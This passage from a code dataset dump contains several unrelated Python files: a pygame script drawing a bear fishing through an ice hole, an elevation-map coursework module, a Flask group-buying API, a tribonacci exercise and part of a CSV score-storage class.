bedro(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует бедро\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x, y + d, 2 * d, 3 / 2 * d])\r\n ellipse(screen, col_outline, [x, y + d, 2 * d, 3 / 2 * d], 1)\r\n\r\n\r\ndef bear_head(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует шаблон головы\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела(прямоугольник в агрументе эллипса начинается с точки, лежащей выше тела на d/2, где d*4 длина тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x, y - 5 / 2 * d, 2 * d, 3 / 2 * d])\r\n ellipse(screen, col_outline, [x, y - 5 / 2 * d, 2 * d, 3 / 2 * d], 1)\r\n\r\n\r\ndef golen(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует голень\r\n :param x: абсцисса центра тела(прямоугольник в агрументе эллипса смещён на d/2 вправо, где d*2 ширина тела)\r\n :param y: ордината центра тела(прямоугольник в агрументе эллипса смещён к нижней точке тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x, y + d, 2 * d, 3 / 2 * d])\r\n ellipse(screen, col_outline, [x, y + d, 2 * d, 3 / 2 * d], 1)\r\n\r\n\r\n\r\ndef eyes(x, y, d, col_eyes):\r\n \"\"\"\r\n Функция рисует глаза\r\n :param x: абсцисса центра тела(смещением получиим самую правую точку(глаз1))\r\n :param y: ордината центра тела(смещением получиим самую правую точку(глаз1))\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_eyes: цвет глаз\r\n :return:\r\n \"\"\"\r\n circle(screen, col_eyes, (x + d, y - 2 * d), d / 10)\r\n circle(screen, col_eyes, (x + 15 / 8 * d, y - 2 * d), d / 10)\r\n\r\n\r\ndef ear(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует ухо\r\n :param x: 
абсцисса центра тела(вправо на четверть тела)\r\n :param y: ордината центра тела(смещение на 1/8 длины тела выше верхней точки)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x + d / 4, y - 5 / 2 * d, d / 3, d / 2])\r\n ellipse(screen, col_outline, [x + d / 4, y - 5 / 2 * d, d / 3, d / 2], 1)\r\n\r\n\r\ndef arm(x, y, d, col_ground = white, col_outline = black):\r\n \"\"\"\r\n Функция рисует руку\r\n :param x: абсцисса центра тела(прямоугольник в агрументе эллипса смещён на 2/3d направо, где d ширина тела)\r\n :param y: ордин��та центра тела(прямоугольник в агрументе эллипса смещён на d/2 вверх, где 4*d высота тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x + d * 2 / 3, y - d / 2, d, 1 / 2 * d])\r\n ellipse(screen, col_outline, [x + d * 2 / 3, y - d / 2, d, 1 / 2 * d], 1)\r\n\r\n\r\ndef mouth(x, y, d, col_mouth):\r\n \"\"\"\r\n Функция рисует рот\r\n :param x: абсцисса центра тела(прямоугольник в агрументе эллипса смещён на d/2 направо, где d ширина тела)\r\n :param y: ордината центра тела(прямоугольник в агрументе эллипса смещён на d/2 выше центра, где 4*d высота тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_mouth: цвет рта\r\n :return:\r\n \"\"\"\r\n y1 = y - 3 / 2 * d\r\n x1 = x + d / 2\r\n x2 = x + 3 / 2 * d\r\n polygon(screen, col_mouth,\r\n [(x1, y1), (x2, y1), (x2, y1 + 1),\r\n (x1, y1 + 1), (x1, y1)])\r\n\r\n\r\ndef ice_hole(x, y, d, col_water, col_ice):\r\n \"\"\"\r\n Функция рисует прорубь\r\n :param x: абсцисса центра тела(смещение на 2.5 ширины от центра вправо)\r\n :param y: ордината центра тела(смещение на 1/6 длины от центра вниз)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_water: цвет воды\r\n :param col_ice: цвет льда\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_water, [x + d * 4.8, y + d * 1.5, 1.5 * d, 3 / 4 * d])\r\n ellipse(screen, col_ice, [x + d * 5, y + d * 1.7, d, 1 / 2 * d])\r\n\r\n\r\ndef fishing_rod(x, y, d, col_rod_base, col_rod_line):\r\n \"\"\"\r\n Функция рисует удочку\r\n :param x: абсцисса центра тела(смещается на длину руки)\r\n :param y: ордината центра тела(смещается до верхней точки эллипса)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_rod_base: цвет удочки\r\n :param col_rod_line: цвет лески\r\n :return: ---\r\n \"\"\"\r\n arc(screen, col_rod_base, [x + 3 / 2 * d, y - 2 * d, 5 * d, 5 * d], 1, 3, 5)\r\n aaline(screen, col_rod_line, [x + 5.36 * d, y + 2 * d], [x + 5.36 * d, y - 1.6 * d], 3)\r\n\r\n\r\ndef fish(x, y, d, col_fbody, col_ftail, col_feye):\r\n \"\"\"\r\n Функция рисует рыбу\r\n :param x: абсцисса центра тела медведя(смещается к проруби)\r\n :param y: ордината центра тела медведя(смещается к проруби)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_fbody: цвет тела рыбы\r\n :param col_ftail: цвет хвоста рыбы\r\n :param col_feye: цвет глаза рыбы\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_fbody, [x + d * 5, y + d * 2.5, 0.5 * d, 1 / 4 * d])\r\n A = (x + 5 * d, y + 2.6 * d)\r\n xq = x + 4.8 * d\r\n polygon(screen, col_ftail, [A, (xq, y + 2.7 * d), (xq, y + 2.5 * d), A])\r\n circle(screen, col_feye, (x + 5.3 * d, y + 2.6 * d), d / 
20)\r\n\r\n\r\nfisher(105, 600, 100)\r\nsun(680, 150, 100, 30, 10)\r\n\r\npygame.display.update()\r\nclock = pygame.time.Clock()\r\nfinished = False\r\nwhile not finished:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finished = True\r\n\r\npygame.quit()\r\n","sub_path":"picture9.1.py","file_name":"picture9.1.py","file_ext":"py","file_size_in_byte":13156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"6878396","text":"from typing import List\n\n\ndef get_average_elevation(m: List[List[int]]) -> float:\n \"\"\"\n Returns the average elevation across the elevation map m.\n\n Examples\n >>> get_average_elevation([])\n 0\n >>> m = [[1,2,3],[4,5,6],[7,8,9]]\n >>> get_average_elevation(m)\n 5.0\n >>> m = [[1,2,2,5],[4,5,4,8],[7,9,9,1],[1,2,1,4]]\n >>> get_average_elevation(m)\n 4.0625\n \"\"\"\n if not valid_map(m):\n return 0\n terms = 0\n amount = 0\n # set up to caalculate average\n for x in range(len(m)):\n for y in range(len(m[x])):\n terms += 1\n amount += m[x][y]\n return amount/terms\n\n\ndef find_peak(m: List[List[int]]) -> List[int]:\n \"\"\"\n Given an non-empty elevation map m, returns the cell of the\n highest point in m.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,2,3],\n [9,8,7],\n [5,4,6]]\n >>> find_peak(m)\n [1,0]\n >>> m = [[6,2,3],\n [1,8,7],\n [5,4,9]]\n >>> find_peak(m)\n [2,2]\n \"\"\"\n # checking for condition\n if not valid_map(m):\n return [0, 0]\n index_cell = [0, 0]\n biggest_cell = [0]\n # finding the biggest value and its index\n for x in range(len(m)):\n for y in range(len(m[x])):\n if m[x][y] > biggest_cell[0]:\n biggest_cell[0] = m[x][y]\n index_cell[0] = x\n index_cell[1] = y\n return index_cell\n\n\ndef is_sink(m: List[List[int]], c: List[int]) -> bool:\n \"\"\"\n Returns True if and only if c is a sink in m.\n \n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,2,3],\n [2,3,3],\n [5,4,3]]\n >>> is_sink(m, [0,0])\n True\n >>> is_sink(m, [2,2])\n True\n >>> is_sink(m, [3,0])\n False\n >>> m = [[1,2,3],\n [2,1,3],\n [5,4,3]]\n >>> is_sink(m, [1,1])\n True\n \"\"\"\n # a = min([min(g) for g in m])\n # check fo conditions\n # valid or not\n if not valid_map(m):\n return False\n # out of bound\n if not c or c[0] > len(m)-1 or c[1] > len(m[0])-1:\n return False\n # create new list called map\n map = []\n # fill the list (map) with -1\n for x in range(len(m)+2):\n map.insert(x, [-1]*(len(m)+2))\n # put m in map\n for x in range(1, len(map)-1):\n for y in range(1, len(map)-1):\n map[x][y] = m[x-1][y-1]\n # biggest crunh in my history (too lazy to do it with an algorythm)\n # we need to compare 8 possibilities; thefore index should be equal to 8\n index = 0\n # since we put orininal m in map, m variables shifted by 1\n x = c[0] + 1\n y = c[1] + 1\n # 8 possibilities\n # creating direction list and running trhough the loop will be efficient\n # however; I am too lazy\n if map[x][y] <= map[x+1][y+1] or map[x+1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x+1][y] or map[x+1][y] == -1:\n index += 1\n if map[x][y] <= map[x+1][y-1] or map[x+1][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y-1] or map[x][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y+1] or map[x][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y+1] or map[x-1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y] or map[x-1][y] == -1:\n index += 1\n if map[x][y] <= map[x-1][y-1] or map[x-1][y-1] == -1:\n index += 1\n 
return index == 8\n\n\ndef find_local_sink(m: List[List[int]], start: List[int]) -> List[int]:\n \"\"\"\n Given a non-empty elevation map, m, starting at start,\n will return a local sink in m by following the path of lowest\n adjacent elevation.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[ 5,70,71,80],\n [50, 4,30,90],\n [60, 3,35,95],\n [10,72, 2, 1]]\n >>> find_local_sink(m, [0,0])\n [3,3]\n >>> m = [[ 5,70,71,80],\n [50, 4, 5,90],\n [60, 3,35, 2],\n [ 1,72, 6, 3]]\n >>> find_local_sink(m, [0,3])\n [2,3]\n >>> m = [[9,2,3],\n [6,1,7],\n [5,4,8]]\n >>> find_local_sink(m, [1,1])\n [1,1]\n \"\"\"\n # valid or not\n if not valid_map(m):\n return False\n # create new list called map\n map = []\n # fill the list (map) with -1\n for x in range(len(m)+2):\n map.insert(x, [-1]*(len(m)+2))\n # put m in map\n for x in range(1, len(map)-1):\n for y in range(1, len(map)-1):\n map[x][y] = m[x-1][y-1]\n # since we put orininal m in map, m variables shifted by 1\n x = start[0] + 1\n y = start[1] + 1\n directions = [[1, 1], [1, 0], [1, -1], [0, -1], [0, 1], [-1, 1], [-1, 0], [-1, -1]]\n # range *2 because it is the longest possible distance\n for a in range(len(map)*2):\n # checking if the cell is miminima in its nbhd. if yes return x & y\n index = 0\n if map[x][y] <= map[x+1][y+1] or map[x+1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x+1][y] or map[x+1][y] == -1:\n index += 1\n if map[x][y] <= map[x+1][y-1] or map[x+1][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y-1] or map[x][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y+1] or map[x][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y+1] or map[x-1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y] or map[x-1][y] == -1:\n index += 1\n if map[x][y] <= map[x-1][y-1] or map[x-1][y-1] == -1:\n index += 1\n if index == 8:\n return [x - 1, y - 1]\n # checking for out bound\n if x == len(map[x])-2 and y == len(map[x])-2:\n break\n # find all differencies around cell and put them in array\n l_differencies = []\n for i in range(8):\n q = map[x+directions[i][0]][y+directions[i][1]]\n save = map[x][y] + q\n if q < 0:\n save = -1\n l_differencies.append(save)\n # if maximum value in array of differncies is negative, break\n if max([n for n in l_differencies]) < 0:\n break\n # find minimum difference\n minima = min([n for n in l_differencies if n > 0])\n # index of minimum equals to direction, apply that that direction\n # 0\n if l_differencies.index(minima) == 0:\n x = x + 1\n y = y + 1\n # 1\n elif l_differencies.index(minima) == 1:\n x = x + 1\n y = y\n # 2\n elif l_differencies.index(minima) == 2:\n x = x + 1\n y = y - 1\n # 3\n elif l_differencies.index(minima) == 3:\n x = x\n y = y - 1\n # 4\n elif l_differencies.index(minima) == 4:\n x = x\n y = y + 1\n # 5\n elif l_differencies.index(minima) == 5:\n x = x - 1\n y = y + 1\n # 6\n elif l_differencies.index(minima) == 6:\n x = x - 1\n y = y\n # 7\n elif l_differencies.index(minima) == 7:\n x = x - 1\n y = y - 1\n return [x - 1, y - 1]\n\n\ndef absolute(x):\n if x < 0:\n return -x\n return x\n\n\ndef valid_map(m: List[List[int]]) -> bool:\n \"\"\"\n Checks if the map is valid or not. 
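Both is_sink() and find_local_sink() above use the same preparation step before scanning neighbours: copy the elevation map into a grid padded with a border of -1 sentinels so that the eight neighbour lookups never run off the edge. A self-contained illustration of that padding step (the 2x2 map is arbitrary):

m = [[1, 2], [3, 4]]
n = len(m)
padded = [[-1] * (n + 2) for _ in range(n + 2)]
for i in range(n):
    for j in range(n):
        padded[i + 1][j + 1] = m[i][j]
print(padded)
# [[-1, -1, -1, -1], [-1, 1, 2, -1], [-1, 3, 4, -1], [-1, -1, -1, -1]]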
Returns True or False\n \"\"\"\n if not m:\n return False\n for x in range(len(m)):\n cells = 0\n for y in range(len(m[x])):\n cells += 1\n if cells != len(m):\n return False\n return True\n\n\ndef can_hike_to(m: List[List[int]], s: List[int], d: List[int], supplies: int) -> bool:\n \"\"\"\n Given an elevation map m, a start cell s, a destination cell d, and\n the an amount of supplies returns True if and only if a hiker could reach\n d from s using the strategy dscribed in the assignment .pdf. Read the .pdf\n carefully. Assume d is always south, east, or south-east of s. The hiker\n never travels, north, west, nor backtracks.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,4,3],\n [2,3,5],\n [5,4,3]]\n >>> can_hike_to(m, [0,0], [2,2], 4)\n True\n >>> can_hike_to(m, [0,0], [0,0], 0)\n True\n >>> can_hike_to(m, [0,0], [2,2], 3)\n False\n >>> m = [[1, 1,100],\n [1,100,100],\n [1, 1, 1]]\n >>> can_hike_to(m, [0,0], [2,2], 4)\n False\n >>> can_hike_to(m, [0,0], [2,2], 202)\n True\n \"\"\"\n # valid or not\n if not valid_map(m):\n return False\n # create new list called map\n map = []\n # fill the list (map) with -1\n for x in range(len(m)+2):\n map.insert(x, [-1]*(len(m)+2))\n # put m in map\n for x in range(1, len(map)-1):\n for y in range(1, len(map)-1):\n map[x][y] = m[x-1][y-1]\n # since we put orininal m in map, m variables shifted by 1\n x = s[0] + 1\n y = s[1] + 1\n directions = [[0, 1], [1, 0]]\n supply = supplies\n if [x - 1, y - 1] == d:\n return True\n # range *2 because it is the longest possible distance\n for a in range(len(map)*2):\n # checking for out bound\n if x == len(map[x]) or y == len(map[x]):\n break\n if supply < 0:\n return False\n # find all sum around cell and put them in array\n l_differencies = []\n l_supply = []\n for i in range(2):\n q = map[x+directions[i][0]][y+directions[i][1]]\n save = map[x][y] + q\n s_save = map[x][y] - q\n if q < 0:\n save = -1\n l_differencies.append(save)\n l_supply.append(absolute(s_save))\n # if maximum value in array of differncies is negative, break\n if max([n for n in l_differencies]) < 0:\n break\n # find minimum difference\n maxima = min([n for n in l_differencies if n > 0])\n # index of minimum equals to direction, apply that that direction\n if [x - 1, y - 1] == d:\n return True\n # east\n if l_differencies.index(maxima) == 0:\n supply = supply - l_supply[0]\n x = x\n y = y + 1\n #print([x - 1, y - 1])\n # south\n elif l_differencies.index(maxima) == 1:\n supply = supply - l_supply[1]\n x = x + 1\n y = y\n #print([x - 1, y - 1])\n if [x - 1, y - 1] == d:\n return True\n return False\n\n\ndef rotate_map(m: List[List[int]]) -> None:\n \"\"\"\n Rotates the orientation of an elevation map m 90 degrees counter-clockwise.\n See the examples to understand what's meant by rotate.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,2,3],\n [2,3,3],\n [5,4,3]]\n >>> rotate_map(m)\n >>> m\n [[3,3,3],\n [2,3,4],\n [1,2,5]]\n >>> m = [[5,9,1,8],\n [2,4,5,7],\n [6,3,3,2],\n [1,7,6,3]]\n >>> rotate_map(m)\n >>> m\n [[8,7,2,3],\n [1,5,3,6],\n [9,4,3,7],\n [5,2,6,1]]\n \"\"\"\n # valid or not\n if not valid_map(m):\n return False\n side = len(m[0])\n # OMG! 
rotating by layers\n for x in range(0, int(side/2)):\n for y in range(x, side-1-x):\n save = m[x][y]\n # from right side to top\n m[x][y] = m[y][side-1-x]\n # from bot to right side\n m[y][side-1-x] = m[side-1-x][side-1-y]\n # from left side to bot\n m[side-1-x][side-1-y] = m[side-1-y][x]\n # left to save\n m[side-1-y][x] = save\n return None\n\n\ndef create_real_map() -> List[List[int]]:\n \"\"\"\n Creates and returns an elevation map from the real world data found\n in the file elevation_data.csv.\n\n Make sure this .py file and elevation_data.csv are in the same directory\n when you run this function to ensure it works properly.\n \"\"\"\n data = open(\"elevation.csv\")\n m = []\n for line in data:\n m.append(line.split(\",\"))\n data.close()\n for i in range(len(m)):\n for j in range(len(m[i])):\n m[i][j] = int(m[i][j])\n return m\n","sub_path":"waterfall_problem.py","file_name":"waterfall_problem.py","file_ext":"py","file_size_in_byte":12127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"560063743","text":"# -*- coding: utf-8 -*-\n\nfrom flask import jsonify, make_response, request, current_app\nfrom flask.ext.restful import Resource\nfrom control.pinpin import Pager, GroupStatus\nfrom module.group.grouphead import GroupHead as GroupHeadModel\nfrom flask.ext.login import current_user\nfrom control.post_weibo import post_weibo\nfrom view.group import group_operator\nfrom view.order import order_operator\nfrom control.ErrorMessages import ErrorMessages as errMsgs\nfrom control.pp import logit\nfrom view.tools.tools import sendException, sendText\nimport arrow\nfrom control.sendmail import sendNewGrouperHelp\n\n\ndef notify(**param):\n post_weibo(**param)\n sendText(u'{nickname} 开了新的团,{body} {url}'.format(nickname=param.get(\n 'nickname'), body=param.get('body'), url=param.get('url')))\n\n\nclass Groups(Resource):\n\n @logit\n def get(self):\n \"\"\"分页返回正在拼团的团,按创建时间倒序\"\"\"\n\n next = False\n prev = False\n try:\n per = request.args.get('per')\n page = request.args.get('page')\n except:\n per = 16\n page = 1\n try:\n per = int(per)\n page = int(page)\n except:\n per = 16\n page = 1\n\n from redisapp import (\n RedisApp,\n list_group_cache_stats\n )\n from redisconfig import (\n GROUPS_API_GET,\n CACHE_HIT_STATS\n )\n\n try:\n if current_app.config['REDIS_CACHE']:\n key = GROUPS_API_GET.KEY\n group_field = GROUPS_API_GET.GROUPS_FIELD.format(page=page)\n pager_field = GROUPS_API_GET.PAGER_FIELD.format(page=page)\n\n r = RedisApp()\n\n cache_group = r.hgetJson(key, group_field)\n cache_pager = r.hgetJson(key, pager_field)\n\n dayid = arrow.utcnow().to('local').format('YYYYMMDD')\n hit_key = CACHE_HIT_STATS.KEY.format(dayid=dayid)\n\n if cache_group and cache_pager:\n\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_CACHE, 1)\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_DB, 0)\n return make_response(jsonify({\"groups\": cache_group, 'pager': cache_pager, 'messages': ''}), 200)\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_CACHE, 0)\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_DB, 1)\n\n current_app.logger.info('Gropus get() Redis no cache')\n\n p = Pager(per, page)\n if page > 1:\n prev = True\n groups = GroupHeadModel.query.filter_by(\n status=GroupStatus.GROUPING).order_by(GroupHeadModel.create_dt.desc()).offset(p.offset).limit(p.limit)\n nextp = Pager(per, page + 1)\n nextgroups = GroupHeadModel.query.filter_by(\n 
status=GroupStatus.GROUPING).order_by(GroupHeadModel.create_dt.desc()).offset(nextp.offset).limit(nextp.limit).count()\n if nextgroups:\n next = True\n pager = {\n 'prev': prev,\n 'next': next,\n 'per': per,\n 'page': page\n }\n listgroups = [g.to_json for g in groups]\n\n if current_app.config['REDIS_CACHE']:\n params = []\n i_params = [(group_field, listgroups), (pager_field, pager)]\n for i_param in i_params:\n param = {\n 'key': key,\n 'field': i_param[0],\n 'data': i_param[1]\n }\n params.append(param)\n from redisapp import hsetRedisKeys\n hsetRedisKeys(params)\n\n return make_response(jsonify({\"groups\": listgroups, 'pager': pager, 'messages': ''}), 200)\n except Exception as e:\n current_app.logger.exception('Gropus get()')\n sendException(e, 'Groups get()')\n return make_response(jsonify({\"messages\": errMsgs.SERVER_ERROR}), 500)\n\n @logit\n def post(self):\n \"\"\"创建团\"\"\"\n\n try:\n if current_user.is_authenticated():\n if current_user.has_alipay():\n groupparam = {\n 'title': request.form['title'],\n 'group_mode': request.form['group_mode'],\n 'transportorg': request.form['transportorg'],\n 'transporturl': request.form['transporturl'],\n 'transport': request.form['transport'],\n 'transporttype': request.form['transporttype'],\n # 前端提交的数据可能是 13. 通过int()处理\n 'plantransportfee': int(request.form['plantransportfee']),\n # 前端提交的数据可能是 13. 通过int()处理\n 'deposit': int(request.form['deposit']),\n 'expresstype': request.form['expresstype'],\n 'customexpressorg': request.form['customexpressorg'],\n 'defaultexpressorg': request.form['defaultexpressorg'],\n 'notes': request.form['notes'],\n 'plancompletedt': request.form['plancompletedt'],\n 'create_userid': current_user.id\n }\n rs = group_operator.createGroup(**groupparam)\n if rs:\n weiboparam = {\n 'body': groupparam.get('title'),\n 'url': 'http://pinpin.in/#group/' + str(rs),\n 'nickname': current_user.nickname\n }\n if not current_user.activate_grouper:\n mailparam = {\n 'reciver': current_user.email\n }\n sendNewGrouperHelp(**mailparam)\n current_user.activate_user_prop('grouper')\n notify(**weiboparam)\n return make_response(jsonify({'id': rs}), 201)\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 501)\n return make_response(jsonify({'messages': errMsgs.NOT_LINK_ALIPAY}), 403)\n return make_response(jsonify({'messages': errMsgs.NOT_LOGIN}), 401)\n except Exception as e:\n current_app.logger.exception('Groups post()')\n sendException(e, 'Groups post()')\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 500)\n\n\nclass Group(Resource):\n\n @logit\n def get(self, id):\n \"\"\"返回团信息\"\"\"\n try:\n g = GroupHeadModel.query.filter_by(group_no=id).first()\n if g:\n isauth = current_user.is_authenticated()\n uid = current_user.id if isauth else 0\n isowner = True if g.create_userid == uid else False\n ishasOrder = '0' if not current_user.is_authenticated else order_operator.hasOrder(\n g.id, uid)\n canBuy = True if g.status == GroupStatus.GROUPING else False\n permission = {\n 'isauth': isauth,\n 'isowner': isowner,\n 'hasOrder': ishasOrder,\n 'canBuy': canBuy\n }\n return make_response(jsonify({\"group\": g.to_json, 'permission': permission}), 200)\n return make_response(jsonify({'messages': errMsgs.NOT_EXIST}), 404)\n except Exception as e:\n current_app.logger.exception('Group get()')\n sendException(e, 'Group get()')\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 500)\n\n\nclass MyGroups(Resource):\n\n def get(self):\n \"\"\"分页返回登陆用户团列表,按创建时间倒序\"\"\"\n\n if 
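The listing endpoints above page through results with Pager(per, page) and then pass p.offset and p.limit to the query; the Pager class itself lives in control.pinpin and is not shown in this file. A hypothetical minimal Pager with the same interface, purely to illustrate how the offset is likely derived:

class Pager:
    # Hypothetical stand-in for control.pinpin.Pager, not the real implementation.
    def __init__(self, per, page):
        self.limit = per
        self.offset = (page - 1) * per

p = Pager(16, 3)
print(p.offset, p.limit)  # 32 16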
current_user.is_authenticated():\n next = False\n prev = False\n try:\n per = request.args.get('per')\n page = request.args.get('page')\n except:\n per = 10\n page = 1\n try:\n per = int(per)\n page = int(page)\n except:\n per = 10\n page = 1\n try:\n p = Pager(per, page)\n if page > 1:\n prev = True\n uid = current_user.id\n groups = GroupHeadModel.query.filter_by(create_userid=uid).order_by(\n GroupHeadModel.create_dt.desc()).offset(p.offset).limit(p.limit)\n nextp = Pager(per, page + 1)\n nextgroups = GroupHeadModel.query.filter_by(create_userid=uid).order_by(\n GroupHeadModel.create_dt.desc()).offset(nextp.offset).limit(nextp.limit).count()\n if nextgroups:\n next = True\n pager = {\n 'prev': prev,\n 'next': next,\n 'per': per,\n 'page': page\n }\n return make_response(jsonify({\"groups\": [g.to_hasOrderjson for g in groups], 'pager': pager}), 200)\n except Exception as e:\n current_app.logger.exception('MyGroups get()')\n sendException(e, 'MyGroups get()')\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 500)\n return make_response(jsonify({'messages': errMsgs.NOT_LOGIN}), 401)\n","sub_path":"api/group/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"143045036","text":"def multiply(a, b): \n \n # Creating an auxiliary matrix \n # to store elements of the \n # multiplication matrix \n mul = [[0 for x in range(3)] \n for y in range(3)]; \n for i in range(3): \n for j in range(3): \n mul[i][j] = 0; \n for k in range(3): \n mul[i][j] += a[i][k] * b[k][j]\n \n # storing the multiplication \n # result in a[][] \n for i in range(3): \n for j in range(3): \n a[i][j] = mul[i][j] # Updating our matrix \n return a\n\ndef power(a,b,c,F, n): \n M = [[1, 1, 1], [1, 0, 0], [0, 1, 0]]\n \n # Multiply it with initial values i.e \n # with F(0) = 0, F(1) = 1, F(2) = 1 \n # if (n == 1): \n # return F[0][0] + F[0][1]; \n if (n == 1): \n return a\n \n if (n == 2): \n return b\n \n if( n == 3):\n return c\n \n power(a,b,c,F, int(n / 2)); \n \n F = multiply(F, F); \n \n if (n % 2 != 0): \n F = multiply(F, M)\n \n # Multiply it with initial values i.e \n # with F(0) = 0, F(1) = 1, F(2) = 1 \n return F[0][0] + F[0][1]\n\ndef tribonacci(a,b,c,i):\n T = [[ 1, 1, 1 ], \n [1, 0, 0 ], \n [0, 1, 0 ]]\n\n # base condition \n if (i == 1): \n return a\n \n if (i == 2): \n return b\n \n if( i == 3):\n return c\n\n else:\n power(T, i - 2)\n \n return T[0][0]\n\ndef solve(a,b,c,i):\n \n MOD = 1000000007\n i = i % MOD\n\t# compute and return answer here\n while(i > 3):\n i = i - 3\n a = a + b + c\n b = b + c + a\n c = c + a + b\n\n arr = [a,b,c]\n return arr[i-1]\n\n \na, b, c, i = list(map(int,input().rstrip().split(\" \")))\n# print(solve(a,b,c,i + 1))\nprint(tribonacci(a,b,c,i))","sub_path":"empress/customtribonacci.py","file_name":"customtribonacci.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"215277602","text":"import json\nimport os\nfrom cStringIO import StringIO\nimport shutil\nimport tempfile\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\n\nfrom source.storage.io_handlers.interface import IOHandlerInterface\nfrom source.storage.stores.merged_scores_store.interface import MergedScoresStoreInterface\nfrom source.storage.stores.merged_scores_store.types import MergedScores, MergerPerformance, MergerModel, \\\n MergedScoresMetadata, 
MergerMetadata\n\n\nclass CSVMergedScoresStore(MergedScoresStoreInterface):\n def __init__(self, io_handler):\n \"\"\"\n @type io_handler: L{IOHandlerInterface}\n \"\"\"\n self.__io_handler = io_handler\n\n def store_merged_scores(self, merged_scores):\n \"\"\"\n @type merged_scores: L{MergedScores}\n \"\"\"\n metadata = merged_scores.metadata\n base_output_path = self.__get_base_merged_scores_path(metadata)\n self.__io_handler.save_raw_data(self.__get_df_as_text(merged_scores.all_merged_scores),\n os.path.join(base_output_path, 'merged_scores.csv'))\n self.__io_handler.save_raw_data(self.__get_df_as_text(merged_scores.merged_suspects_scores),\n os.path.join(base_output_path, 'merged_suspects.csv'))\n metadata_path = self.__get_merger_metadata_path(metadata)\n self.__io_handler.save_raw_data(json.dumps(metadata.merger_metadata.to_dict(), indent=2, allow_nan=False),\n metadata_path)\n\n def load_merger_metadata(self, metadata):\n metadata_path = self.__get_merger_metadata_path(metadata)\n real_metadata = MergerMetadata.from_dict(json.loads(self.__io_handler.load_raw_data(metadata_path)))\n return real_metadata\n\n def load_merged_scores(self, metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n @return: Loaded merged scores according to the given metadata\n @rtype: L{MergedScores}\n @raise LookupError: When scores don't exist\n \"\"\"\n base_output_path = self.__get_base_merged_scores_path(metadata)\n all_scores_df = pd.read_csv(StringIO(self.__io_handler.load_raw_data(os.path.join(base_output_path,\n 'merged_scores.csv'))),\n index_col=0)\n all_scores_df.index = all_scores_df.index.astype(int)\n suspects_scores_path = os.path.join(base_output_path, 'merged_suspects.csv')\n suspects_scores_df = pd.read_csv(StringIO(self.__io_handler.load_raw_data(suspects_scores_path)), index_col=0)\n suspects_scores_df.index = suspects_scores_df.index.astype(float)\n metadata_path = self.__get_merger_metadata_path(metadata)\n real_metadata = MergerMetadata.from_dict(json.loads(self.__io_handler.load_raw_data(metadata_path)))\n return MergedScores(all_scores_df, suspects_scores_df, real_metadata)\n\n def 